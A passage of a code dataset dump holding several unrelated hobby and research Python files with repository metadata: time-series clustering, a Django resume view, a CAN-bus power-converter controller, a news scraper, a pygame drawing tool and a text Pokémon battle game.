reorder_colors=True):\n\n def normalize(word):\n for i in range(word.shape[0]):\n std = np.std(word[i])\n if std == 0:\n word[i] = word[i] - np.mean(word[i])\n else:\n word[i] = (word[i] - np.mean(word[i])) / np.std(word[i])\n return word.flatten()\n\n sss = self.mts.samples\n N = len(sss)\n dtw = make_multivariate_dtw(self.mts.word_shape)\n\n results = []\n for i in range(N):\n w = normalize(sss[i].reshape(self.mts.word_shape))\n cw_dists = [dtw(cw, w) for cw in self.codebook.codebook.values()]\n results.append(cw_dists)\n\n bounds = self.mts.bounds\n sizes = []\n for i in range(len(bounds)-1):\n start = bounds[i]\n end = bounds[i+1]\n sizes.append(end-start)\n tn = max(sizes)\n\n chromatogram = np.zeros((len(bounds) - 1, tn))\n raw = np.zeros((len(bounds) - 1, tn))\n\n def window_smooth(data, S):\n output = []\n M = len(data)\n for i in range(M):\n min_val = max(i-(S // 2), 0)\n max_val = min(i+(S // 2), M)\n\n dsum = np.sum(data[min_val:max_val], axis=0)\n most_common = np.argmin(dsum) + 1\n output.append(most_common)\n return np.array(output)\n\n bounds = self.mts.bounds\n sizes = []\n for i in range(len(bounds)-1):\n start = bounds[i]\n end = bounds[i+1]\n sizes.append(end-start)\n\n for i in range(len(sizes)):\n data = np.array(results[bounds[i]:bounds[i+1]])\n\n if smoothing_window > 0:\n chromatogram[i, :sizes[i]] = window_smooth(data, smoothing_window)\n\n else:\n chromatogram[i, :sizes[i]] = np.argmin(data, axis=1) + 1\n\n raw[i, :sizes[i]] = np.argmin(data, axis=1) + 1\n\n self.chromatogram = chromatogram\n self.raw = raw\n\n self.smoothing_window = smoothing_window\n self.smoothing_stats()\n\n print(\"--------------------------------------------------\")\n if reorder_colors:\n self.reorder_colors()\n\n print(\"--------------------------------------------------\")\n self.segment_users(on=segment_on)\n self.rendered = True\n\n # Computes smoothing statistics:\n # - number of transitions (Δ)\n # - bandwidth mean and std\n def smoothing_stats(self):\n U, T = self.raw.shape\n\n raw_changes = 0\n smooth_changes = 0\n raw_len = []\n smooth_len = []\n\n for u in range(U):\n raw_row = self.raw[u]\n smooth_row = self.chromatogram[u]\n\n last_raw = raw_row[0]\n last_smooth = smooth_row[0]\n max_len_raw = 1\n max_len_smooth = 1\n\n for i in range(1, len(raw_row)):\n curr_raw = raw_row[i]\n curr_smooth = smooth_row[i]\n if curr_raw == 0:\n break\n\n if curr_raw != last_raw:\n raw_changes += 1\n\n raw_len.append(max_len_raw)\n max_len_raw = 1\n else:\n max_len_raw += 1\n\n if curr_smooth != last_smooth:\n smooth_changes += 1\n\n smooth_len.append(max_len_smooth)\n max_len_smooth = 1\n else:\n max_len_smooth += 1 \n\n last_raw = curr_raw\n last_smooth = curr_smooth\n\n self.d_raw = raw_changes / U\n self.d_smooth = smooth_changes / U\n\n print(\"SMOOTHING STATS: Δ_raw={}, Δ_smooth={}, ratio={:.4f}\".format(raw_changes, smooth_changes, raw_changes / smooth_changes))\n print(\"CW LENGTH STATS: μ_raw ={:.4f}, σ_raw ={:.4f}\\n μ_smooth={:.4f}, σ_smooth={:.4f}\"\\\n .format(np.mean(raw_len), np.std(raw_len), \n np.mean(smooth_len), np.std(smooth_len)))\n\n def reorder_colors(self):\n len_stats = self.get_length_stats()\n\n means = [len_stats[i][0] for i in range(1, self.codebook.K+1)]\n print(\"Bandwidth means: {}\".format(means))\n order = np.argsort(means)[::-1]\n order = list(order)\n def reorder(x):\n x = int(x)\n if x == 0:\n return 0\n return order.index(x-1) + 1\n\n self.reorder_colors = np.vectorize(reorder)\n self.codebook.reorder_colors = np.vectorize(reorder)\n\n print(\"New color order: {}\".format(order))\n self.color_order = order\n\n # How to cluster users in the chromatogram\n # - 'freqs': clusters users based on their codeword frequency vectors\n # - 'logfreqs': clusters users based on the log of their codeword frequency vectors\n # - 'markov': clusters users based on their codeword transition matrix\n # - 'width': clusters users based on their bandwidth mean and stddevs\n def segment_users(self, on='freqs'):\n if on =='freqs':\n freqs = self.get_freqs_per_user()\n\n elif on == 'logfreqs':\n freqs = self.get_freqs_per_user()\n freqs = np.log(freqs + 1e-12)\n\n elif on == 'markov':\n K = self.codebook.K\n U = len(self.users)\n markov = self.get_markov_model()\n\n freqs = np.zeros((U, K*K))\n\n for i in range(U):\n freqs[i] = markov[self.users[i]].flatten()\n\n elif on == 'width':\n freqs = self.get_freqs_per_user()\n len_per_user = self.get_lengths_per_user()\n\n K = self.codebook.K\n U = len(self.users)\n lengths = np.zeros((U, 2*K))\n\n for i in range(U):\n u = self.users[i]\n for k, l in len_per_user[u].items():\n if len(l) > 0:\n l = np.array(l)\n lmin = np.min(l)\n lmax = np.max(l)\n\n if lmax == lmin:\n lengths[i, k-1] = np.mean(l) - lmin\n else:\n lengths[i, k-1] = (np.mean(l) - lmin) / (lmax - lmin)\n\n else:\n lengths[i, k-1] = 0\n\n else:\n print(\"Unknown parameter {}\".format(on))\n\n ordering = self.duo_cluster(freqs, np.array(self.users), 0)\n \n self.users = list(ordering)\n print(\"New ordering: \", ordering)\n\n idx = np.argsort(np.argsort(ordering))\n\n self.clustered = True\n self.chromatogram = self.chromatogram[idx]\n self.raw = self.raw[idx]\n\n def get_freq_diff(self, u1, u2):\n freqs = self.get_freqs_per_user(ax=1)\n diff = freqs[u1].mean(axis=0) - freqs[u2].mean(axis=0)\n self._freq_diff = diff\n self.freq_diff = abs(diff)\n\n # Recursive clustering method\n def duo_cluster(self, cbf, group, level):\n tabs = \"\"\n t = level\n while t > 0:\n tabs = tabs + \"\\t\"\n t = t - 1\n \n print(tabs, group.shape[0], \"USERS\", group)\n if group.shape[0] <= 2:\n return group\n \n CF = linkage(cbf, method='complete', metric=\"euclidean\")\n clusters = fcluster(CF, 2, criterion='maxclust')\n g1 = np.where(clusters == 1)\n g2 = np.where(clusters == 2)\n if len(g1[0]) == len(group):\n return group\n \n u1 = group[g1]\n u2 = group[g2]\n\n if level == 0:\n self.get_freq_diff(g1, g2)\n\n cbf1 = cbf[g1]\n cbf2 = cbf[g2]\n\n return np.concatenate(np.array([self.duo_cluster(cbf1, u1, level + 1), \n self.duo_cluster(cbf2, u2, level+1)]))\n\n\n def get_codeword_distribution(self):\n dist = {i+1: 0 for i in range(self.codebook.K)}\n\n for row in self.chromatogram:\n for cw in row:\n cw = int(cw)\n if cw == 0:\n break\n dist[cw] += 1\n\n total = sum(dist.values())\n\n for cw in dist.keys():\n dist[cw] /= total\n\n return dist\n\n\n ###########################\n # CHROMATOGRAM STATISTICS #\n ###########################\n\n def get_length_stats(self):\n len_dict = self.get_codeword_length_distribution()\n stats = {i+1: [] for i in range(self.codebook.K)}\n\n for cw, lens in len_dict.items():\n if len(lens) > 0:\n stats[cw] = (np.mean(lens), np.std(lens))\n else:\n stats[cw] = (0, 0)\n return stats\n\n def get_codeword_length_distribution(self):\n lengths = {i+1: [] for i in range(self.codebook.K)}\n\n K = self.codebook.K\n\n for i in range(len(self.mts.users)):\n row = self.chromatogram[i]\n\n last_cw = int(row[0])\n max_len = 1\n for j in range(1, len(row)):\n if row[j] == 0:\n break\n\n curr_cw = int(row[j])\n\n if curr_cw == last_cw:\n max_len += 1\n else:\n lengths[last_cw].append(max_len)\n max_len = 1\n\n last_cw = curr_cw\n\n return lengths\n\n def get_lengths_per_user(self):\n users = self.users\n K = self.codebook.K\n\n len_per_user = {}\n\n for i in range(len(users)):\n len_per_cw = {i+1: [] for i in range(K)}\n\n row = self.chromatogram[i]\n\n last_cw = int(row[0])\n max_len = 1\n for j in range(1, len(row)):\n if row[j] == 0:\n break\n\n curr_cw = int(row[j])\n\n if curr_cw == last_cw:\n max_len += 1\n else:\n len_per_cw[last_cw].append(max_len)\n max_len = 1\n\n last_cw = curr_cw\n\n len_per_user[users[i]] = len_per_cw\n\n return len_per_user\n\n def get_markov_model(self):\n markov = {}\n\n K = self.codebook.K\n users = self.users\n\n for i in range(len(users)):\n transition_matrix = np.zeros((K, K))\n row = self.chromatogram[i]\n\n for j in range(len(row) - 1):\n if row[j+1] == 0:\n break\n\n curr_cw = int(row[j]) - 1\n next_cw = int(row[j+1]) -1\n transition_matrix[curr_cw, next_cw] += 1\n\n row_sums = transition_matrix.sum(axis=1) + 1e-12\n transition_matrix = transition_matrix / row_sums[:, np.newaxis]\n markov[users[i]] = transition_matrix\n\n return markov\n\n def get_freqs_per_user(self, ax=1):\n K = self.codebook.K\n U = len(self.users)\n freqs = np.zeros((U, K))\n\n for i in range(U):\n row = self.chromatogram[i]\n\n for j in range(len(row)):\n cw = int(row[j])\n if cw == 0:\n break\n else:\n freqs[i, cw - 1] += 1\n\n sums = freqs.sum(axis=ax) + 1e-12\n if ax == 1:\n freqs = freqs / sums[:, np.newaxis]\n else:\n freqs = freqs / sums[np.newaxis, :]\n return freqs\n\n def visualize(self, users=None):\n if users:\n visualization.plot_chromatogram(self, users)\n else:\n visualization.plot_chromatogram(self, self.users)\n\n def plot_user(self, user, sigma=3, ylim=None):\n visualization.plot_user(self, user, sigma, ylim)\n\n def plot_freq_diff(self):\n visualization.plot_freq_diff(self)\n\n############\n# SAMPLING #\n############\n\ndef subsequences(a, L):\n n, m = a.shape\n windows = int(m/L) \n window_range = np.linspace(0, windows-1, (windows-1) * 2 + 1)\n ss = []\n for x in window_range:\n ss.append(a[:, int(x*L):int((x+1)*L)])\n return np.array(ss)\n\ndef extract_samples(umts, L):\n sss = np.array([])\n bounds = [0]\n for u in umts: \n mts = umts[u]\n ss = subsequences(mts, L)\n bounds.append(bounds[-1] + ss.shape[0])\n if sss.shape[0] == 0:\n sss = ss\n else:\n sss = np.concatenate((sss, ss))\n word_shape = sss.shape[-2:]\n sss = sss.reshape(sss.shape[0], -1)\n return sss, bounds, word_shape\n\ndef sample_sss(A, n):\n return A[np.random.choice(A.shape[0], n, replace=False), :]\n\n\ndef sample_kcenters(words, kcenters, dist_metric, cull_threshold=100): \n if len(words) <= 1: \n return np.array(kcenters)\n\n sys.stdout.write(\"\\033[K\")\n print(\"Sampling ... (words: {}, centers: {})\".format(words.shape[0], len(kcenters)), end='\\r')\n \n n = words.shape[0]\n dist = [dist_metric(kcenters[-1], words[i]) for i in range(0, n)]\n dists = np.array(dist)\n \n idx = np.argsort(dists)\n kcenters.append(words[idx[-1]]) \n dists = np.sort(dists)\n cull_at = np.argmax(dists>cull_threshold)\n \n cull_indices = idx[:cull_at]\n cull_indices = np.append(cull_indices, idx[-1])\n words = np.delete(words, cull_indices, 0)\n \n return np.array(sample_kcenters(words, kcenters, dist_metric, cull_threshold))\n\n####################\n# DISTANCE METRICS #\n####################\n\ndef EuclideanDistance(t1, t2):\n return np.sqrt(np.sum((t1-t2)**2))\n\n# Dynamic Time Warping Distance\ndef DTWDistance(s1, s2):\n # Initialize distance matrix (nxn), pad filling with inf \n DTW= {}\n n1 = range(len(s1))\n n2 = range(len(s2))\n for i in n1:\n DTW[(i, -1)] = float('inf')\n for i in n2:\n DTW[(-1, i)] = float('inf')\n DTW[(-1, -1)] = 0\n \n # Compute the distances (O(nm) time)\n for i in n1:\n for j in n2:\n dist = (s1[i]-s2[j])**2\n DTW[(i, j)] = dist + min(DTW[(i-1, j)], DTW[(i, j-1)], DTW[(i-1, j-1)])\n return np.sqrt(DTW[len(s1)-1, len(s2)-1])\n\ndef DTWDistanceD(t1, t2):\n arr = []\n for i in range(0, t1.shape[0]):\n arr.append(DTWDistance(t1[i], t2[i]))\n return sum(arr)\n\ndef DTWDistance2D(t1, t2):\n t1 = t1.reshape(WORD_SHAPE)\n t2 = t2.reshape(WORD_SHAPE)\n arr = []\n for i in range(0, t1.shape[0]):\n arr.append(DTWDistance(t1[i], t2[i]))\n return sum(arr)\n\ndef dtw2(a, b, word_shape):\n a = a.reshape(word_shape)\n b = b.reshape(word_shape)\n return tsm.dtw(a, b)\n\ndef make_multivariate_dtw(word_shape):\n def dtw(a, b):\n a = a.reshape(word_shape)\n b = b.reshape(word_shape)\n return tsm.dtw(a, b)\n return dtw\n\n###########################\n# CHROMATOGRAPHY FUNCTION #\n###########################\n\ndef distill(mts_df, window_size, cull_threshold, K, return_meta=False):\n # Reformat MTS from pandas df to dict user --> matrix\n mts, users, features = df2mts(mts_df)\n\n # Compute sample width\n L = time2L(users, mts, window_size)\n\n # Extract all sequence from MTS\n sss, bounds, word_shape = extract_samples(mts, L)\n N = sss.shape[0]\n print(\"Extracted N={} sequences with shape (F={}, L={})\".format(N, word_shape[0], word_shape[1]))\n print(\"--------------------------------------------------\")\n\n # Sample using greedy k-centers clustering\n first_center = random.randint(0, N)\n first_center = N // 2\n seed = sss[first_center]\n code_sample = np.delete(sss, first_center, 0)\n\n # Construct distance metric\n dtw = make_multivariate_dtw(word_shape)\n\n samples = sample_kcenters(code_sample, [seed], dtw, cull_threshold)\n M = samples.shape[0]\n print('Sampled M={} codewords, {:.2f}%% of original N={} sequences'.format(M, (M / N) * 100, N))\n print(\"--------------------------------------------------\")\n\n # Hierarchical clustering and pruning\n linkage_matrix = linkage(samples, method='complete', metric=dtw)\n clusters = fcluster(linkage_matrix, K, criterion='maxclust')\n\n # Codeword extraction\n codebook = {}\n for i in range(len(clusters)):\n cluster_id = clusters[i]\n if not cluster_id in codebook:\n codebook[cluster_id] = []\n codebook[cluster_id].append(samples[i])\n\n # Computer centroid\n for k in codebook:\n codeset = np.array(codebook[k])\n dist = np.sum(squareform(distance.pdist(codeset, metric=dtw)), 0)\n clustroid = np.argmin(dist)\n codebook[k] = codeset[clustroid]\n\n print('Extracted {} codewords'.format(K))\n\n meta = {\n \"L\": L,\n \"window_size\": window_size,\n \"bounds\": bounds,\n \"word_shape\": word_shape,\n \"users\": users, \n \"features\": features, \n \"subsequences\": sss.tolist(),\n \"linkage_matrix\": linkage_matrix.tolist()\n }\n\n if return_meta:\n return codebook, meta\n else:\n return codebook\n\ndef apply(codebook, mts_df, window_size, smoothing_window=None):\n mts, users, features = df2mts(mts_df)\n # Compute sample width\n L = time2L(users, mts, window_size)\n\n sss, bounds, word_shape = extract_samples(mts, L)\n dtw = make_multivariate_dtw(word_shape)\n\n results = []\n for i, window in enumerate(sss):\n codeword = np.argmin([dtw(codeword, window) for codeword in codebook.values()])\n results.append(codeword + 1)\n\n sizes = []\n for i in range(len(bounds)-1):\n start = bounds[i]\n end = bounds[i+1]\n sizes.append(end-start)\n tn = max(sizes)\n\n chromatogram = np.zeros((len(bounds) - 1, tn))\n\n for i in range(len(sizes)):\n data = np.array(results[bounds[i]:bounds[i+1]])\n if smoothing_window:\n raise NotImplementedError\n return None\n else:\n chromatogram[i, :sizes[i]] = data\n\n return chromatogram\n\n","repo_name":"Hybrid-Ecologies/eluent","sub_path":"eluent/activity.py","file_name":"activity.py","file_ext":"py","file_size_in_byte":22971,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"76"} +{"seq_id":"34883023433","text":"from .http import post\n\n\nclass User:\n\n def __init__(self, bot, id_):\n self.bot = bot\n self.id = id_\n self._name = None\n self._messages_sent = None\n\n async def update(self):\n if not (self._name is None or self._messages_sent is None):\n return\n resp = await post(self.bot.session, \"/get_user\", data={\"id\": self.id})\n data = await resp.json()\n self._name = data[\"name\"]\n self._messages_sent = data[\"messages_sent\"]\n\n @property\n async def name(self):\n await self.update()\n return self._name\n\n @property\n async def messages_sent(self):\n await self.update()\n return self._messages_sent\n\n def __eq__(self, other):\n if not isinstance(other, User):\n return NotImplemented\n return self.id == other.id\n\n def __str__(self):\n if self._name:\n return self._name\n return repr(self)\n","repo_name":"LyricLy/capncord.py","sub_path":"capncord/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"14337841767","text":"from django.shortcuts import render_to_response\nfrom django.http import HttpResponse\nfrom django.template import RequestContext\nfrom django.template.loader import get_template\nfrom resume.models import *\n\nimport StringIO\nimport ho.pisa as pisa\nimport logging\n\nclass PisaNullHandler(logging.Handler):\n def emit(self, record):\n pass\n\nlogging.getLogger(\"ho.pisa\").addHandler(PisaNullHandler())\n\n\ndef index(request):\n try:\n ip = request.META['REMOTE_ADDR']\n visitor = Visitor.objects.all().filter(ipaddress=ip)\n if len(visitor) != 1:\n visitor = Visitor()\n visitor.ipaddress = ip\n visitor.save()\n else:\n visitor = visitor[0]\n visitor.visits += 1\n visitor.save()\n except:\n pass\n \n basic = BasicInformation.objects.all()\n if len(basic) != 1:\n raise Exception(\n 'Error: You must have exactly ONE BasicInformation object')\n basic = basic[0]\n degrees = Degree.objects.all().order_by('order')\n jobs = Job.objects.all().order_by('order')\n projects = Project.objects.all().order_by('order')\n skills = Skill.objects.all().order_by('order')\n extras = Extracurricular.objects.all().order_by('order')\n\n for job in jobs:\n job.dates = DateRange.objects.filter(job=job)\n for project in projects:\n project.dates = DateRange.objects.filter(project=project)\n for extra in extras:\n extra.dates = DateRange.objects.filter(extra=extra)\n \n pdf = False\n if request.method == \"GET\" and \"pdf\" in request.GET:\n pdf = True\n \n context = RequestContext(request, locals())\n template = get_template(\"index.html\")\n html = template.render(context)\n result = StringIO.StringIO()\n if pdf:\n pdf = pisa.pisaDocument(StringIO.StringIO(html.encode(\"UTF-8\")), result)\n response = HttpResponse(mimetype=\"application/pdf\")\n response['Content-Disposition'] = 'attachment; Resume.pdf'\n response.write(result.getvalue())\n return response\n\n return render_to_response('index.html', locals())\n\n\n","repo_name":"zachtib/resumeweb","sub_path":"resume/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2106,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"76"} +{"seq_id":"35029015106","text":"import can\nimport time\nimport select\nimport sys\n\nCONTROL_SEND = 0x159\nSTATUS_SEND = 0X15C\nACK_ID = 0x459\nSTATUS_ID = 0x45C\n\nclass Zeka:\n zeka_precharge_done = False\n zeka_fullstop_and_device_not_running = True\n zeka_read_voltage = 0\n zeka_read_current = 0\n old_current_set = 0\n\n def zeka_init(self, bus):\n print(\"Init\")\n msg = can.Message(arbitration_id=CONTROL_SEND, data=[0x80, 0x00, 0x04, 0x00, 0x03, 0xFF, 0xFF, 0xFF], is_extended_id=False)\n\n try:\n bus.send(msg)\n except can.CanError:\n print(\"Message not sent\")\n\n def zeka_start(self, bus):\n print(\"Start\")\n msg = can.Message(arbitration_id=CONTROL_SEND, data=[0x80, 0x01, 0x01, 0x00, 0x03, 0xFF, 0xFF, 0xFF], is_extended_id=False)\n\n try: \n bus.send(msg)\n except can.CanError:\n print(\"Message not sent\")\n\n def zeka_stop(self, bus):\n print(\"Stop\")\n msg = can.Message(arbitration_id=CONTROL_SEND, data=[0x80, 0x01, 0x04, 0x00, 0x03, 0xFF, 0xFF, 0xFF], is_extended_id=False)\n\n try:\n bus.send(msg)\n except can.CanError:\n print(\"Message not sent\")\n\n def zeka_set_voltage_current(self, bus, voltage, current):\n print(\"Set voltage and current\")\n voltage = int(voltage * 10)\n current = int(current * 10)\n a_to_b_ctrl = [0x83, voltage>>8, voltage & 0x00FF, current>>8, current & 0x00FF, 0xFF, 0xFF, 0xFF]\n msg = can.Message(arbitration_id=CONTROL_SEND, data=a_to_b_ctrl, is_extended_id=False)\n\n try:\n bus.send(msg)\n except can.CanError:\n print(\"Message not sent\")\n\n def zeka_main_status(self, bus):\n print(\"Main status\")\n msg = can.Message(arbitration_id=STATUS_SEND, data=[0xA0, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF], is_extended_id=False)\n\n try:\n bus.send(msg)\n print(f\"Message sent on {bus.channel_info}\")\n except can.CanError:\n print(\"Message not sent\")\n\n def zeka_feedback_status(self, bus):\n# print(\"Feedback status for side B\")\n msg = can.Message(arbitration_id=STATUS_SEND, data=[0xA2, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF], is_extended_id=False)\n\n try:\n bus.send(msg)\n except can.CanError:\n print(\"Message not sent\")\n\n def zeka_receive(self, bus):\n msg = bus.recv()\n\n if msg.arbitration_id == ACK_ID:\n if msg.data[0] == 0x80:\n zeka_prev_msg = 0x80\n elif msg.data[0] == 0x83:\n zeka_prev_msg = 0x83\n\n elif msg.arbitration_id == STATUS_ID:\n if msg.data[0] == 0xA0:\n if (msg.data[2] & 0b00000011) == 0b000:\n self.zeka_precharge_done = True\n else:\n self.zeka_precharge_done = False\n\n if (msg.data[2] & 0b01000100) == 0b01000000:\n self.zeka_fullstop_and_device_not_running = True\n else:\n self.zeka_fullstop_and_device_not_running = False\n\n zeka_prev_msg = 0xA0\n\n if msg.data[0] == 0xA2:\n self.zeka_read_voltage = ((msg.data[1]<<8) | msg.data[2]) * 0.1 # 0.1V\n self.zeka_read_current = ((msg.data[3]<<8) | msg.data[4]) * 0.1 # 0.1A\n\n zeka_prev_msg = 0xA2\n\n def controller(self, bus, v_set, c_set):\n current_set = 0\n if self.zeka_read_voltage > v_set and self.zeka_read_voltage < v_set + 5:\n current_set = c_set\n elif self.zeka_read_voltage > v_set + 5:\n current_set = c_set - 0.1\n elif self.zeka_read_voltage > v_set - 5 and self.zeka_read_voltage < v_set:\n current_set = c_set + 0.1\n elif self.zeka_read_voltage < v_set - 5:\n current_set = c_set + 0.2\n\n if current_set != self.old_current_set:\n self.zeka_set_voltage_current(bus, v_set + 50, current_set)\n self.zeka_receive(bus)\n\n self.old_current_set = current_set\n\nif __name__ == \"__main__\":\n manual = False\n\n bus = can.interface.Bus(bustype='slcan', channel='/dev/ttyACM0', bitrate=500000)\n zeka_obj = Zeka()\n\n zeka_obj.zeka_init(bus)\n zeka_obj.zeka_receive(bus)\n while not zeka_obj.zeka_precharge_done:\n zeka_obj.zeka_main_status(bus)\n zeka_obj.zeka_receive(bus)\n time.sleep(1)\n zeka_obj.zeka_set_voltage_current(bus, 550, 3)\n zeka_obj.zeka_receive(bus)\n zeka_obj.zeka_start(bus)\n zeka_obj.zeka_receive(bus)\n\n current_set = 3.0\n while True:\n zeka_obj.zeka_feedback_status(bus)\n zeka_obj.zeka_receive(bus)\n time.sleep(0.5)\n if manual and sys.stdin in select.select([sys.stdin], [], [], 0)[0]:\n line = sys.stdin.readline()\n if line:\n tmp = line.strip().split(\" \")\n current = float(tmp[0])\n voltage = float(tmp[1])\n zeka_obj.zeka_set_voltage_current(bus, voltage, current)\n zeka_obj.zeka_receive(bus)\n else:\n if sys.stdin in select.select([sys.stdin], [], [], 0)[0]:\n line = sys.stdin.readline()\n if line:\n current_set = float(line.strip())\n zeka_obj.controller(bus, 500, current_set)\n else:\n zeka_obj.controller(bus, 500, current_set)\n\n zeka_obj.zeka_stop(bus)\n","repo_name":"lindawang6/aps490","sub_path":"zeka.py","file_name":"zeka.py","file_ext":"py","file_size_in_byte":5430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"71007213045","text":"from convencional import convencional\nimport pygame\n\n\n# classe da interface de desenho\nclass InterfaceDesenho:\n def __init__(self) -> None:\n # iniciando a janela\n self.janela = pygame.display.set_mode((640, 480)) #tamanho da Janela\n pygame.display.set_caption(\"Linhas Convencionais\")\n\n # lista de pontos para desenhar, inclui os pontos já desenhados\n # e inclui os pontos que estão sendo desenhados\n pontos = []\n\n posicao_inicial = None\n posicao_atual = None\n\n # variável para indicar se deve fazer a linha em tempo real ou não\n desenhando = False\n\n # loop infinito para verificar de alguém estpa tentando desenhar\n while True:\n # loop pela lista de eventos\n for event in pygame.event.get():\n # se o evento foi de saída, fechar a janela\n if event.type == pygame.QUIT:\n pygame.quit()\n exit(1)\n \n #preenchendo a janela apenas com braco no fundo\n self.janela.fill((255, 255, 255))\n\n #pegando a posição inicial quando o mouse é pressionado\n if any(pygame.mouse.get_pressed()) and desenhando is False:\n #retorno da posição de quando foi pressionado\n posicao_inicial = pygame.mouse.get_pos() \n # agora pode desenhar\n desenhando = True\n\n #desenhando o linha vermelha de posição\n if desenhando is True:\n posicao_atual = pygame.mouse.get_pos()\n convencional(self.janela, (0,0,255), posicao_inicial, posicao_atual) \n\n #salvando os pixels de posição inicial e final da reta\n if not any(pygame.mouse.get_pressed()) and desenhando is True:\n posicao_atual = pygame.mouse.get_pos()\n pontos.append((posicao_inicial, posicao_atual))\n desenhando = False\n \n # traçando as retas já feitas\n for i in range(len(pontos)):\n convencional(self.janela, (0,0,0), pontos[i][0], pontos[i][1]) \n\n pygame.display.flip()\n\n\njanela = InterfaceDesenho()","repo_name":"GuiBatalhoti/projeto_cg","sub_path":"linhas/convencional/interface_desenho.py","file_name":"interface_desenho.py","file_ext":"py","file_size_in_byte":2352,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"6390269126","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom scrapy.linkextractors import LinkExtractor\nfrom scrapy.spiders import CrawlSpider, Rule\nfrom datetime import datetime\nimport json\nfrom string import Template\nclass NewsSpider(CrawlSpider):\n name = 'newsspider'\n page_number = 1\n\n def __init__(self, *args, **kwargs):\n self.url = kwargs.get('url')\n self.domain = kwargs.get('domain')\n self.settingXpath = kwargs.get('xpath')\n self.start_urls = [self.url]\n self.url = self.start_urls[0]\n temp = kwargs.get('config')\n self.config = json.loads(temp)\n page_number = 1\n def start_request(self):\n yield scrapy.Request(self.url, self.parse)\n\n def parse(self, response):\n\n for i in range(self.config['pageconfig']['numberpage']):\n \n template = Template(self.config['pageconfig']['pageurltemplate'])\n urlPage = template.substitute(page=str(self.page_number))\n self.page_number += 1\n yield scrapy.Request(urlPage, callback=self.crawlDataTotalPage)\n \n def crawlDataTotalPage(self, response):\n configCss = self.config['newsconfig']['cssselector']\n allDiv = response.css(configCss['allpost'])\n for news in allDiv:\n link = news.css(configCss['link']).extract()\n imageLink = news.css(configCss['imagelink']).extract()[0]\n title = news.css(configCss['title']).extract()[0]\n description = ''.join(news.css(configCss['description']).extract()).lstrip().rstrip()\n yield{\n 'link' : 'https://'+self.domain+link[0],\n 'imageLink' : imageLink,\n 'title' : title,\n 'description' : description,\n 'domain' : self.domain\n }\n","repo_name":"fibonacci998/AnalysisAndCrawlService","sub_path":"scrapy_app/scrapy_app/spiders/newsspider.py","file_name":"newsspider.py","file_ext":"py","file_size_in_byte":1802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"38160449628","text":"import random\nimport bad\nfrom commands import cs as cs\nimport pokemonList\nimport pokemonart\nimport moves\n\nclass bcolors:\n HEADER = '\\033[95m'\n OKBLUE = '\\033[94m'\n OKCYAN = '\\033[36m'\n OKGREEN = '\\033[92m'\n WARNING = '\\033[93m'\n FAIL = '\\033[91m'\n ENDC = '\\033[0m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'\n\n\nwhile True:\n print(bcolors.WARNING + bcolors.BOLD + \"List of pokemon: \" + bcolors.ENDC)\n print(bcolors.OKGREEN + \"\\ncharmander\\nbulbasaur\\nsquirtle\\n \" + bcolors.ENDC)\n pokemon = input(\"Input your pokemon's name: \").lower()\n try:\n pk = pokemonList.pokemons[pokemon]\n break\n except:\n print(bcolors.FAIL + \"That's not a pokemon you dumbass.\" + bcolors.ENDC)\n\n\nprint(bcolors.OKBLUE + bcolors.BOLD + bcolors.UNDERLINE + \"\\n\" + str(pk[pokemon]) + \", i choose you!\\n\" + bcolors.ENDC)\npika = pokemonart.art[pokemon]\n\n\nprint(pika)\n\ntbDelay = 0\n\n\nhealth = pk['health']\npp = pk['pp']\ndefense = pk['baseDef']\n\nehealth = 100\nepp = 100\nedefense = 5\n\nenemyMissTurn = 0\nmissTurn = 0\n\nhealth = moves.scratch(health)\n\nattacks = [pk['move1']['name'], pk['move2']['name'], 'PP drain', pk['move4']['name']]\n\ndef makeScreen():\n input('Press Enter to continue!')\n cs()\n print(pika)\n\ndef message(msg, color):\n a = ''\n for i in range(len(msg)):\n a += ('-')\n \n print(\"\"\"{2}\n |{0}|\n |{1}|\n |{0}|\n {3}\"\"\".format(a, msg, color, bcolors.ENDC))\n\n \ndef printStats():\n message('Health: ' + str(health) + ' Pp: ' + str(pp) + ' Defense: ' + str(defense), bcolors.OKGREEN)\n message('Enemy health: ' + str(ehealth) + ' Enemy pp: ' + str(epp) + ' Enemy defense: ' + str(edefense), bcolors.OKGREEN)\n \n\nprintStats()\n\ndef checkHealth():\n global ehealth\n global health\n\n if(ehealth <= 0):\n message('You win, good job.', bcolors.BOLD + bcolors.WARNING)\n exit()\n elif(health <= 0):\n message(\"Fkn dumbass, lost to a rolling dice.\", bcolors.FAIL)\n exit()\n\n\ndef atk():\n global epp\n global ehealth\n global edefense\n global enemyMissTurn\n global missTurn\n global pp\n global tbDelay\n\n\n atks = attacks[0] + ' - ' + attacks[1] + ' - ' + attacks[2] + ' - ' + attacks[3]\n message(atks, bcolors.WARNING)\n atek = input('select attack 1/2/3/4 : ')\n \n try:\n int(atek)\n except:\n print(bcolors.FAIL + bad.threat + bcolors.ENDC)\n atk()\n\n attack = int(atek)\n\n try:\n attacks[attack -1]\n except:\n print('\\n' + bcolors.FAIL + bad.threat + bcolors.ENDC)\n atk()\n\n if(not missTurn):\n if(attack == 1):\n ehealth -= round(10 / edefense, 0)\n message(pokemon + \" used {0}, it did {1} damage!\".format(attacks[0], round(10/edefense,0)), bcolors.OKBLUE)\n elif(attack == 2):\n if(pp >= 5):\n pp -= 5\n if(random.randint(1,4) == 4):\n enemyMissTurn = 1\n message(pokemon + \" used {0}, the enemy was confused!\".format(attacks[1]), bcolors.OKBLUE)\n else:\n message(pokemon + ' used {0}, the enemy is not confused!'.format(attacks[1]), bcolors.OKBLUE)\n else:\n message(pokemon + \" doesn't have enough pp!\", bcolors.OKBLUE)\n elif(attack == 